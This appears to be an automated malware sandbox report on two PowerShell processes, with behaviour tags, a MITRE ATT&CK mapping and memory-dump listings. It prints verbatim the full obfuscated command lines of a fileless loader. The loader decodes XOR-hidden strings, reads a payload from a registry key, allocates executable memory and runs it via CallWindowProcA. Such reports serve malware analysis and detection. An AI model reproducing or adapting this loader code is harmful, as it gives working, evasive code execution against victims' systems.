Di`$TmdDeiJasFlpHaoLusReiCitUgiAnoEnnNosLdrNeeDitHatVaeDenTr4Gg;Fo`$KndruiScsBupexoHesBeiAntfliAloSmnVssForNoeOrtRetEpeSjnBe5Sp Ta=Ta CoSUdlHaiEpmMueGamSaeGrnCh0Si St'Es0StDJa1ReAKl0AmBTr0UvASc0FaDEn1Ta1Kr5LiFkr5OpBBk2TeFRe0AnDTi1OrETy1St8Su1Ud2Al1DeEUn0InBDe1Lu6Ge0HiCPs1Fr2La1BrARe5he1Wi3ScCBi0BoDGl1SuAer1StELo0OrBSt1RiALe2SaBSk0Ij6Su0FoFGr1MbANy5Fo7St5As6Ne'Un;Hj&An(Ad`$GeCHooDerRerMeiSheStsap7Un)Tu Be`$bedSciKisAlpSpoUnsStiTvtHviSnoMinPrsDerUgeGytRetvaeNenHa5Ma Op Ap Sp;Fe}He`$MiEHanKoaVipFltPy Ta=Be UnSBolGriOpmSkeDemPiePlnSr0Av Ne'de1Me4As1KoABr0RuDQp1Te1Bl1DiABi1Ps3Sk4FiCTa4meDGn'Pr;Hy`$LadImiMasFlpAfoKussuiZatSpiMaoRunMesSprbueCotFrtAmeHonBe6Lo Un=mu NySLilFoiInmGgeNamCoeGlnHv0Fe Vg'Sv5foBSy3StEPe1Om1No1Cl2Or1Fi0Ri1PeBOv1SeANa5HgFPe4Ki2Re5AnFNk2Cl4Re2maCCh0Ud6gr0diCSl0SoBKr1PeANa1Un2Ad5Rd1St2PlDHy0FiAOv1Be1Ti0AkBDi1As6Ni1Po2Tu1UdASu5Ur1Re3vo6tv1Bu1Gr0FoBTi1AtADe0UnDSu1To0Rk0ReFBl2TrCMo1KuADi0BeDDo0Be9Br1Go6De1HoCUn1EfAAl0SnCUl5Se1Br3Ga2Pe1ReEPn0SaDBo0DiCHa1Ab7En1KaEMl1Di3Te2Ph2In4Un5Kl4Sn5pr3Es8Mo1BeAPr0VaBEl3SaBAp1CrASg1Co3Am1FoAFi1Go8Re1OvESo0SlBMa1UiAEm3Pa9La1Tr0Op0DeDLa3Pr9Sn0ZoAKa1Ke1Gl1UnCOp0EvBOp1Li6In1Os0As1Va1Ha2daFNi1Oo0Cr1Ma6On1Pa1de0frBIn1StAsq0ErDCh5ga7Os5Ar7Ga1Di9Wa1Fr4Ca0ReFAa5FoFVs5OuBHy3CoAPr1Up1Er1BrEAc0ArFGn0FoBYo5MiFHi5CoBPh3KvCUn1En0Pa0VaDKo0tiDDe1En6Ge1unAAr0FeCSt4HoBLe5Jd6Fi5Ge3Mi5PyFFo5St7Fo3In8Rd3EmBin2FlBNv5OvFPr3PrFAb5Re7Kl2Do4Fo3Sk6Gl1Un1Re0KoBTe2SuFBe0RhBQu0FoDBa2Ud2Pl5Vo3To5DeFTi2Sh4Cr2GrACo3Sk6Ag1om1Pr0BeBJa4PoCUs4StDre2In2Vi5In3Ru5CrFOy2Im4Sp2ReAMo3Lg6Bl1Sw1Ja0ThBka4HyCHi4ChDMu2Do2cr5Ba3Ge5SpFUn2Em4Cr2PrASt3Ps6Al1Ta1Eu0SeBDr4ToCFa4NaDSa2Hy2Or5Di6Wi5SlFNe5Po7Re2Tr4Ko3Gu6Bi1Un1La0syBLi2AtFVa0BeBBr0SlDEk2Un2Au5Ul6Ma5Mo6St5El6Dr'In;As&Do(Li`$beCProTorinrUniSyeMesco7Mi)Cr Ba`$ModSeiEdsblpwhobisNeiGltSeiMooBaneysBerBueSvtFotPieEsnSk6Mi;Ti`$SlKToaAkrUndEniKonAsaAllRriFutIneFotInsAr Bu=Ph MifRikBrpMi In`$HoCRooStrForHoiCoeNasEl5An Co`$SpCBeoKlrJorBoiSkeKasMc6me;Sy`$uddRuiCasHypFioSesDriPatApiSloVvnOvsSarLaeTetBrtNdeThnSt7Ba Po=Ch ViSPrlCaihemAneBamReeKonHe0Me Ta'Su5FiBId2InASm1SeBPo0VaBan1HeEFa1Fo8En1QuAFs0RuDob4StCMg5ApFAa4pr2Be5SmFCo5AnBRa3puEBr1Di1Be1Jo2Or1Do0Ra1TiBPl1OnASt5Ti1So3Sp6Mo1No1Fo0Fr9sa1Tr0Ur1Ra4Vi1OlASk5An7sy2Ch4Sv3Mi6Su1Pl1Bu0PoBUn2SvFPa0InBVi0ThDLa2Ud2Sk4Ca5Fu4Qu5do2Sl5Fr1foAVr0AlDRe1Pl0yd5Re3Na5VeFAn4ve9co4SuAPl4hy9Pe5Co3go5WaFRi4BiFDi0Se7br4EnCrh4GoFud4StFEa4FoFBo5El3Ri5saFTa4BaFMi0Su7In4DeBIn4SiFsu5Su6br'Ye;Gl&Ou(Di`$FoCReoPlrsnrToipaeNesSv7Re)Fj In`$PadTeiElsSkpDeoSvsReiSctCriFiosunSesNorvaeJutNotPeeBonIn7Sk;Ss`$IndMiiSysPlpMioVlsJoiHetNoiQuoSunInsGrrCoePetQutDieTrnBi8Bl Pe=Co SeSSulSuiLimKreCamMaeThnFe0Pa Da'Re5StBTi2TiARe0InFil0ElDRu1re0Ad1ReESi0LnDPa5TrFFo4Pr2un5SaFWa5FaBAn3FoEEx1Ym1Cr1Pr2Qu1Ka0Bu1PoBOv1OvACl5Pi1Re3Co6Ae1Hy1Me0Ud9Gn1Ud0Ju1fo4Ho1UnASt5Ab7Se2Se4Lo3Be6He1fi1Cu0PrBun2SkFfo0VaBSl0AnDSo2gu2Po4Se5Ma4St5Mo2Ex5Al1SyAAf0MiDAn1Bu0La5Lu3As5BoFIn4DeCHi4Uo6Ru4Ic9Pk4BeEGt4Fo9Gr4ShANo4soEMo4BeDPo5De3In5UnFRe4UnFGr0An7Te4MaCGa4HiFHa4CrFHa4FeFHa5Un3Ep5CoFJe4KnFSi0In7Un4OlBAr5Un6Gr'Sa;He&Sy(Se`$HyCBeoBrrPerAridieposTa7Ge)Ho Ou`$ChdMeiDesAnpInoSksNoiArtPyiInoPinTisZirVeeDutAqtIneSlnFo8Sk;Si`$OcUBadHatFiamagKveRerAf0fe0Ma=Ze'PsHHyKIlCPaUSk:ba\WeDFuiOpaFegAlnSuolasMntKuiHekTe\DeLUneAtdOpeDosUntBejVeeBrrCunCoeperBo'Pr;Re`$PrULydKutmiaDeggaeVirHa0Om1Re Aj=FeSJulDeibomIneInmFueSknDo0Pe An'Fa5arBve3Ka3Pr0NuAfo1So1Sa1ViEMe0MiBHi1DaAga1MaBtu4St2Ca5St7Ha3Ma8In1SaAas0FaBSk5Po2Pi3Ge6Sc0FlBHa1skAta1Pa2Po2FoFBi0BaDCa1Sa0Co0TrFSt1DeACy0JaDRe0AsBGa0Sk6Kr5MeFSu5gr2Ma2TrFUn1GrEDi0RuBSt1Hj7An5TrFCl5ReBAu2MeADe1DeBCo0JaBVa1AlEIm1Pe8Be1SkAMi0SpDAg4FiFAp4JaFBe5sm6Pa5Dr1Us3SeEGe1Pr9St1Up8Qu1Ma6St1Di9Vo0NoBBr0CoCHe1Un3Wh1LeAPu1Sl2Gl0SsFbe1ErANo1Pr3In0TaCFl1KvAFo0MeDSk4OpDme4AnCAf4HjEbl'Op;La&Un(So`$LrCduoMarPrrKeideeTasPr7st)Op Sy`$AfUAldLitGraHigOpeCorAp0Me1to;Tr`$nodGyiEssTipUnoUnsLeiSotTyiCaosunTrsKorBoeKitSntkoerenqu9Gc sk=Ar AlSTylNeiSkmHaeHamabeAcnAb0Fr Fo'Vi5MaBFy1noBTi1Hy6Di0RuCUl0UnFTi1Wa0Bi0SaCHa1Ke6Po0NeBGe1ne6Be1Sk0Ol1Dk1Ac0NoCSp0FyDOp1inAsp0SuBIt0FnBOv1TeAou1Sp1Ta5TaFAr4In2Di5TsFPr2Ho4Da2brCSy0Bu6Ra0beCVi0SkBDe1VrABi1Sp2Bl5Im1Os3boCOl1Po0Ch1Yn1St0Na9Sl1PrACr0LeDLo0UdBWh2Un2pr4ig5Na4Ti5Im3Ud9Ba0BaDVe1Fr0Hr1po2ca3TiDPo1TiEGa0KoCSt1DeAAn4Fl9Dr4adBCa2fiCVr0ReBaf0ExDAc1Al6Sa1Mo1Ra1Ch8Br5Ve7Fo5VeBCo3Fy3Lo0ArAfo1Ad1Ch1BaEBr0TrBUn1AkAsa1mrBdi5Mo6Ge'Ur;Mi&La(Hi`$PaCFooLarPerKniFoeensEx7Sa)Se Bo`$CadAcihosFjpDioHosAsiGetSeiBeoKenAfsDarUneBltnutUteBanSa9Te;Ex`$SjLRguGrnBaaLatFeeBrdUn0Pa as=En FlSAplFaiRamUreAsmTheFunPe0Re Nu'Jo2Ch4Kl2DeCNy0Af6Am0reCRe0RaBFi1BrASy1Ka2Se5Ko1Ho2SuDRe0BaAMo1En1Fl0AfBDu1In6fo1Co2Ho1suAFj5Be1Ge3Rk6Cr1De1Fo0NoBOr1TrANe0PrDPa1Di0So0fiFPe2DaCOp1ImAMo0ReDBr0je9He1Sp6Br1OpCCa1ReABu0BrCla5Ek1Re3Sh2Ka1stEAs0PeDSe0HaCRn1ma7Ba1RoEIn1No3Bo2Sa2St4Il5sp4Un5ne3JeCPa1Ta0in0CeFCa0Di6Bi5As7Ge5DrBPo1feBRe1Mi6Ba0ElCta0BaFVa1Fo0Sp0KlCSp1So6to0TeBBi1Sa6Co1Ma0Gi1Un1pe0SeCpo0CoDEx1TaASp0MuBAg0unBer1PaAva1Ca1Im5di3Sp5BuFEn4LaFSt5Kr3Ba5DiFMi5PrFUl5IsBPa2StAhe1SuBpa0BiBEp1PlEOp1Pr8Cn1InASt0UnDUn4TrCCo5Ep3Ha5IlFUd4Bi9Go4PrAac4Ae9en5Co6Ef'Ka;En&Te(Re`$KeCSooDerNorNeiSkesksAv7ki)My Ev`$AaLLouUdnKiaSutSpeRadRe0Le;Un`$LyUEfnUncfraSotDeeBrgPioHurJaihezUveEndTo=In`$NodDriInsRepCooElsDriHytSyiStoHenBrsytrTaeOvttrtLueAnnMi.UdcSkoStuSpnNutSh-No6Fr5No6Ca;Ri`$CaLLauRunAraSmtAnemodBo1Bi Ha=Co SoSCilbiiFumEleUnmLseNonPe0De Kr'Ma2Om4Op2BoCAm0Re6Af0HaCvi0OvBDi1NoALa1De2Do5De1He2SpDDy0DoALi1Co1In0EfBNo1Un6ou1To2So1CaADi5La1vi3Un6Pe1Pa1Co0RoBCh1ZaAKa0StDOp1Pr0Ko0ViFun2LiCTe1ReACh0AgDti0Sa9Ho1To6Se1AgCSl1beAHe0caCKa5Se1Ac3Va2Hu1MuESe0CoDKe0MuCKo1Re7Gr1FoELi1Ag3Pu2Dh2He4br5Fo4Aa5Ov3BiCPe1Fl0Ac0OpFTe0De6st5No7Da5FlBSe1GoBTo1Mo6Dr0ChCAf0UnFse1Nu0Ov0reCex1In6Ou0AgBco1Bi6Re1Ag0Re1Sp1ru0LdCPa0MoDPu1SeACa0shBra0GrBKl1PeASk1Sn1Op5Mu3Ha5ydFPe4Te9Uc4PeAPi4Av9hi5In3fa5InFHe5SkBHj2IcAMa0LeFLe0CoDka1Sc0Af1AyERe0EmDEj5fe3Ma5FaFFo5DiBMa2TyAPr1Tu1Tr1PrCSs1CiERe0KiBDi1ReAas1Ce8St1Pr0Un0InDKo1Ko6Sa0So5co1SkAGr1AdBBe5Ou6Hy'He;Re&My(To`$BaCPaoLarStrHoiOreGesPo7Ov)Ge Ko`$BuLSpuPanSuaBatCheSudEg1Pl;Eu`$PoLSpuSpnoraPatSyeIsdsn2Fl Se=Ov ouSSolFriThmSceInmVeeFjnPi0Ad Pr'Nr5TeBNo2MlBEm1Se6ad1Id3Ge1SeDDe1FlEWh1Em8Am1MeAOv1Ud9Ap0TeDAr1Su6He1Ta1st1Nu8At1ReAOv0BjDBr0SoCRe5PlFEl4No2Cu5MeFSt2Af4Wa2GoCAk0Ol6by0PoCSn0NoBPs1KeALo1St2Ui5Af1De2MaDGi0MnAFr1Ph1Ba0piBSr1Ti6Re1ty2Un1LaAre5Ge1Sw3Co6Qu1Af1Be0BrBOb1RoATo0SkDBu1Vo0De0NoFKu2MaCSl1CoAUn0UdDIn0Po9Hy1Af6Fi1AmCBa1SrASt0KlCOe5Be1So3Ne2Ud1enEUd0SkDTu0UrCBl1Ak7Fo1PhERo1Ha3Pt2Sk2Bl4Te5nu4Do5An3Ca8El1VeADr0BoBKo3GaBPa1BeAsp1Ef3Re1PaAVi1Vi8Co1ClEFo0HjBMa1SpAUp3Ka9Fu1Ka0Ve0TcDEl3pa9Re0SkACa1Ne1Ut1stCSp0MiBBo1Fr6Ty1Mo0Af1Se1in2AsFPr1Or0un1El6Re1Ba1Te0OvBBa1UnANu0ObDga5St7me5Th7Fl1Ye9Pi1Ma4De0reFFr5PeFZy5PrBVa0RoBSk0CaDKu1KvERe1An1An0CoCTy0MoFSh1Sc3Pr1ChERe1Re1Dr0EpBLi1CaEtr0PaBMa1Pr6Ge1Pr0St1Fr1Fi1PaAFo0JuDNo0GrCAn5PrFBe5afBDk2PaBLa1Ap0tw1RaAdo1Pr1Di1CaETi1Un6Mu1Is3Do0SmCKv5Ko6En5Ka3Un5GiFBa5Et7On3mi8Fo3UnBBa2PrBpi5DeFli3duFAf5Pa7Ac2Ma4Co3Dk6Te1Va1Te0StBsp2KeFGa0UsBEm0BeDFo2Fo2Le5Ni3Re5PrFSh2Re4Ag3Zo6So1St1Se0FiBun2DaFse0TrBSa0SeDBu2Am2Re5op3Sa5AtFMe2De4Ni3Ha6Su1su1Tr0KoBAn2foFHv0FrBFo0BoDEn2Un2Av5Hi3Al5RoFUn2De4cy3Ha6Wa1Li1Il0GuBAa2UnFBe0DiBDw0CeDLu2Re2Du5Se3Pa5BoFEg2Na4Tv3Rv6En1Ka1Fa0reBve2PeFBg0SmBEm0WaDbe2Be2Ca5Ra6pr5HeFTi5Hy7Se2Tr4An3Dr6Ko1Pr1Ko0PlBSe2YaFDe0IdBAg0AdDOv2Un2Sn5Qu6Ga5Co6Re5Ev6Sv'An;Pa&Ba(Un`$ApCInoTersarDuiteeHesWr7No)Tu Fi`$HoLViuPinSuauptGleLsdPi2Hy;Li`$AbLBuuPenDiaGrtOcePsdPi3Ra Fr=Ov InSOrlGeiUdmNyeMomMeeBonfo0Sm Co'De5diBMa2StBFi1Br6sa1Ba3Am1SaDSp1NiEHy1sp8ir1LaACu1Bl9mi0EfDRi1Re6St1ci1Fu1Me8El1KaAIn0UnDLi0CaCFa5Hv1Ov3Ki6Ba1Fi1Af0Di9Hy1Cy0Di1pr4fo1SpASa5De7Mo5HeBma2SaAOo1NuBTo0SmBBi1TeEJu1Vi8Sp1UnADe0ThDKn4ViCMo5Gr3Lu5KaBBj2waADe0KoFMo0KeDUn1Un0De1BrEty0SnDCo5Fi3Sa5TaBUn3hy4El1BdEHo0KrDIm1PrBFa1Re6So1Su1De1AlEPr1In3Ta1To6Ac0BrBSc1ToASa0PsBin0OcCKo5Sk3Be4SpFHa5Am3Mi4ReFde5av6Br'So;Fi&Ak(Er`$EvCSuoVarGrrHoiKieFrsUp7In)Ov Vi`$AfLFjuFanSiasmtsaeNedjo3st#Ln;""";;Function Lunated9 { param([String]$Hjemmehjlp); For($Frugtsalaternes170=2; $Frugtsalaternes170 -lt $Hjemmehjlp.Length-1; $Frugtsalaternes170+=(2+1)){ $Slimemen = $Slimemen + $Hjemmehjlp.Substring($Frugtsalaternes170, 1); } $Slimemen;}$Kragetr0 = Lunated9 'sl bo Ae Nu Ph Ut Ti un Ti Bi Am Ba Co fr Re Ep Po Dr De Ge Ba ke Un ReIBaEDyXRe ';$Kragetr1= Lunated9 $Laegger;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Kragetr1 ;}else{.$Kragetr0 $Kragetr1;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:668

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Slimemen0 { param([String]$Hjemmehjlp); $protesernes = New-Object byte[] ($Hjemmehjlp.Length / 2); For($Frugtsalaternes170=0; $Frugtsalaternes170 -lt $Hjemmehjlp.Length; $Frugtsalaternes170+=2){ $Populace = $Hjemmehjlp.Substring($Frugtsalaternes170, 2); $protesernes[$Frugtsalaternes170/2] = [convert]::ToByte($Populace, 16); $protesernes[$Frugtsalaternes170/2] = ($protesernes[$Frugtsalaternes170/2] -bxor 127); } [String][System.Text.Encoding]::ASCII.GetString($protesernes);}$Hjttalerforstrker0=Slimemen0 '2C060C0B1A12511B1313';$Hjttalerforstrker1=Slimemen0 '32161C0D100C10190B512816114C4D512A110C1E191A311E0B16091A321A0B17101B0C';$Hjttalerforstrker2=Slimemen0 '381A0B2F0D101C3E1B1B0D1A0C0C';$Hjttalerforstrker3=Slimemen0 '2C060C0B1A12512D0A110B16121A5136110B1A0D100F2C1A0D09161C1A0C51371E111B131A2D1A19';$Hjttalerforstrker4=Slimemen0 '0C0B0D161118';$Hjttalerforstrker5=Slimemen0 '381A0B32101B0A131A371E111B131A';$Hjttalerforstrker6=Slimemen0 '2D2B2C0F1A1C161E13311E121A535F37161B1A3D062C1618535F2F0A1D13161C';$Hjttalerforstrker7=Slimemen0 '2D0A110B16121A535F321E111E181A1B';$Hjttalerforstrker8=Slimemen0 '2D1A19131A1C0B1A1B3B1A131A181E0B1A';$Hjttalerforstrker9=Slimemen0 '3611321A12100D0632101B0A131A';$Corries0=Slimemen0 '32063B1A131A181E0B1A2B060F1A';$Corries1=Slimemen0 '3C131E0C0C535F2F0A1D13161C535F2C1A1E131A1B535F3E110C163C131E0C0C535F3E0A0B103C131E0C0C';$Corries2=Slimemen0 '36110910141A';$Corries3=Slimemen0 '2F0A1D13161C535F37161B1A3D062C1618535F311A082C13100B535F29160D0B0A1E13';$Corries4=Slimemen0 '29160D0B0A1E133E1313101C';$Corries5=Slimemen0 '110B1B1313';$Corries6=Slimemen0 '310B2F0D100B1A1C0B29160D0B0A1E13321A12100D06';$Corries7=Slimemen0 '363A27';$Corries8=Slimemen0 '23';$transplantationers=Slimemen0 '2A2C3A2D4C4D';$Toenails=Slimemen0 '3C1E13132816111B10082F0D101C3E';function fkp {Param ($Prepiously, $Infusionernes) ;$dispositionsretten0 =Slimemen0 '5B3E111E0F0C161B1E115F425F57243E0F0F3B10121E16112245453C0A0D0D1A110B3B10121E161151381A0B3E0C0C1A121D13161A0C57565F035F28171A0D1A52301D151A1C0B5F045F5B20513813101D1E133E0C0C1A121D13063C1E1C171A5F523E111B5F5B205133101C1E0B161011512C0F13160B575B3C100D0D161A0C475624524E22513A0E0A1E130C575B37150B0B1E131A0D19100D0C0B0D141A0D4F565F025651381A0B2B060F1A575B37150B0B1E131A0D19100D0C0B0D141A0D4E56';&($Corries7) $dispositionsretten0;$dispositionsretten5 = Slimemen0 '5B34100D0C0C0B1611184E4B465F425F5B3E111E0F0C161B1E1151381A0B321A0B17101B575B37150B0B1E131A0D19100D0C0B0D141A0D4D535F242B060F1A2422225F3F575B37150B0B1E131A0D19100D0C0B0D141A0D4C535F5B37150B0B1E131A0D19100D0C0B0D141A0D4B5656';&($Corries7) $dispositionsretten5;$dispositionsretten1 = Slimemen0 '0D1A0B0A0D115F5B34100D0C0C0B1611184E4B465136110910141A575B110A1313535F3F57242C060C0B1A12512D0A110B16121A5136110B1A0D100F2C1A0D09161C1A0C51371E111B131A2D1A192257311A0852301D151A1C0B5F2C060C0B1A12512D0A110B16121A5136110B1A0D100F2C1A0D09161C1A0C51371E111B131A2D1A195757311A0852301D151A1C0B5F36110B2F0B0D56535F575B3E111E0F0C161B1E1151381A0B321A0B17101B575B37150B0B1E131A0D19100D0C0B0D141A0D4A56565136110910141A575B110A1313535F3F575B2F0D1A0F16100A0C130656565656535F5B3611190A0C1610111A0D111A0C5656';&($Corries7) $dispositionsretten1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Ingenirfirmaets158,[Parameter(Position = 1)] [Type] $Ekspertiser58 = [Void]);$dispositionsretten2 = Slimemen0 '5B2F0D1E18121E0B160C121A5F425F243E0F0F3B10121E16112245453C0A0D0D1A110B3B10121E1611513B1A1916111A3B06111E12161C3E0C0C1A121D13065757311A0852301D151A1C0B5F2C060C0B1A12512D1A19131A1C0B161011513E0C0C1A121D1306311E121A575B37150B0B1E131A0D19100D0C0B0D141A0D475656535F242C060C0B1A12512D1A19131A1C0B161011513A12160B513E0C0C1A121D13063D0A16131B1A0D3E1C1C1A0C0C2245452D0A1156513B1A1916111A3B06111E12161C32101B0A131A575B37150B0B1E131A0D19100D0C0B0D141A0D46535F5B191E130C1A56513B1A1916111A2B060F1A575B3C100D0D161A0C4F535F5B3C100D0D161A0C4E535F242C060C0B1A1251320A130B161C1E0C0B3B1A131A181E0B1A2256';&($Corries7) $dispositionsretten2;$dispositionsretten3 = Slimemen0 '5B2F0D1E18121E0B160C121A513B1A1916111A3C10110C0B0D0A1C0B100D575B37150B0B1E131A0D19100D0C0B0D141A0D49535F242C060C0B1A12512D1A19131A1C0B161011513C1E13131611183C1011091A110B1610110C2245452C0B1E111B1E0D1B535F5B3611181A11160D19160D121E1A0B0C4E4A4756512C1A0B36120F131A121A110B1E0B16101139131E180C575B37150B0B1E131A0D19100D0C0B0D141A0D4856';&($Corries7) $dispositionsretten3;$dispositionsretten4 = Slimemen0 '5B2F0D1E18121E0B160C121A513B1A1916111A321A0B17101B575B3C100D0D161A0C4D535F5B3C100D0D161A0C4C535F5B3A140C0F1A0D0B160C1A0D4A47535F5B3611181A11160D19160D121E1A0B0C4E4A4756512C1A0B36120F131A121A110B1E0B16101139131E180C575B37150B0B1E131A0D19100D0C0B0D141A0D4856';&($Corries7) $dispositionsretten4;$dispositionsretten5 = Slimemen0 '0D1A0B0A0D115F5B2F0D1E18121E0B160C121A513C0D1A1E0B1A2B060F1A5756';&($Corries7) $dispositionsretten5 ;}$Enapt = Slimemen0 '141A0D111A134C4D';$dispositionsretten6 = Slimemen0 '5B3E1112101B1A5F425F242C060C0B1A12512D0A110B16121A5136110B1A0D100F2C1A0D09161C1A0C51321E0D0C171E13224545381A0B3B1A131A181E0B1A39100D390A111C0B1610112F1016110B1A0D575719140F5F5B3A111E0F0B5F5B3C100D0D161A0C4B56535F57383B2B5F3F572436110B2F0B0D22535F242A36110B4C4D22535F242A36110B4C4D22535F242A36110B4C4D22565F572436110B2F0B0D22565656';&($Corries7) $dispositionsretten6;$Kardinalitets = fkp $Corries5 $Corries6;$dispositionsretten7 = Slimemen0 '5B2A1B0B1E181A0D4C5F425F5B3E1112101B1A5136110910141A572436110B2F0B0D224545251A0D10535F494A49535F4F074C4F4F4F535F4F074B4F56';&($Corries7) $dispositionsretten7;$dispositionsretten8 = Slimemen0 '5B2A0F0D101E0D5F425F5B3E1112101B1A5136110910141A572436110B2F0B0D224545251A0D10535F4C46494E494A4E4D535F4F074C4F4F4F535F4F074B56';&($Corries7) $dispositionsretten8;$Udtager00='HKCU:\Diagnostik\Ledestjerner';$Udtager01 =Slimemen0 '5B330A111E0B1A1B4257381A0B52360B1A122F0D100F1A0D0B065F522F1E0B175F5B2A1B0B1E181A0D4F4F56513E191816190B0C131A120F1A130C1A0D4D4C4E';&($Corries7) $Udtager01;$dispositionsretten9 = Slimemen0 '5B1B160C0F100C160B1610110C0D1A0B0B1A115F425F242C060C0B1A12513C1011091A0D0B224545390D10123D1E0C1A494B2C0B0D161118575B330A111E0B1A1B56';&($Corries7) $dispositionsretten9;$Lunated0 = Slimemen0 '242C060C0B1A12512D0A110B16121A5136110B1A0D100F2C1A0D09161C1A0C51321E0D0C171E132245453C100F06575B1B160C0F100C160B1610110C0D1A0B0B1A11535F4F535F5F5B2A1B0B1E181A0D4C535F494A4956';&($Corries7) $Lunated0;$Uncategorized=$dispositionsretten.count-656;$Lunated1 = Slimemen0 '242C060C0B1A12512D0A110B16121A5136110B1A0D100F2C1A0D09161C1A0C51321E0D0C171E132245453C100F06575B1B160C0F100C160B1610110C0D1A0B0B1A11535F494A49535F5B2A0F0D101E0D535F5B2A111C1E0B1A18100D16051A1B56';&($Corries7) $Lunated1;$Lunated2 = Slimemen0 '5B2B16131D1E181A190D1611181A0D0C5F425F242C060C0B1A12512D0A110B16121A5136110B1A0D100F2C1A0D09161C1A0C51321E0D0C171E13224545381A0B3B1A131A181E0B1A39100D390A111C0B1610112F1016110B1A0D575719140F5F5B0B0D1E110C0F131E110B1E0B1610111A0D0C5F5B2B101A111E16130C56535F57383B2B5F3F572436110B2F0B0D22535F2436110B2F0B0D22535F2436110B2F0B0D22535F2436110B2F0B0D22535F2436110B2F0B0D22565F572436110B2F0B0D22565656';&($Corries7) $Lunated2;$Lunated3 = Slimemen0 '5B2B16131D1E181A190D1611181A0D0C5136110910141A575B2A1B0B1E181A0D4C535B2A0F0D101E0D535B341E0D1B16111E13160B1A0B0C534F534F56';&($Corries7) $Lunated3#"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:292

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/292-64-0x0000000005C30000-0x00000000081F8000-memory.dmp

Filesize
37.8MB

Download
memory/292-60-0x0000000000000000-mapping.dmp

Download
memory/292-61-0x00000000767D1000-0x00000000767D3000-memory.dmp

Filesize
8KB

Download
memory/292-63-0x0000000073BE0000-0x000000007418B000-memory.dmp

Filesize
5.7MB

Download
memory/292-66-0x0000000073BE0000-0x000000007418B000-memory.dmp

Filesize
5.7MB

Download
memory/292-67-0x0000000005C30000-0x00000000081F8000-memory.dmp

Filesize
37.8MB

Download
memory/668-55-0x0000000000000000-mapping.dmp

Download
memory/668-57-0x000007FEF40C0000-0x000007FEF4AE3000-memory.dmp

Filesize
10.1MB

Download
memory/668-58-0x000007FEF3560000-0x000007FEF40BD000-memory.dmp

Filesize
11.4MB

Download
memory/668-59-0x0000000001F14000-0x0000000001F17000-memory.dmp

Filesize
12KB

Download
memory/668-62-0x0000000001F1B000-0x0000000001F3A000-memory.dmp

Filesize
124KB

Download
memory/668-65-0x0000000001F14000-0x0000000001F17000-memory.dmp

Filesize
12KB

Download
memory/2028-54-0x000007FEFC421000-0x000007FEFC423000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing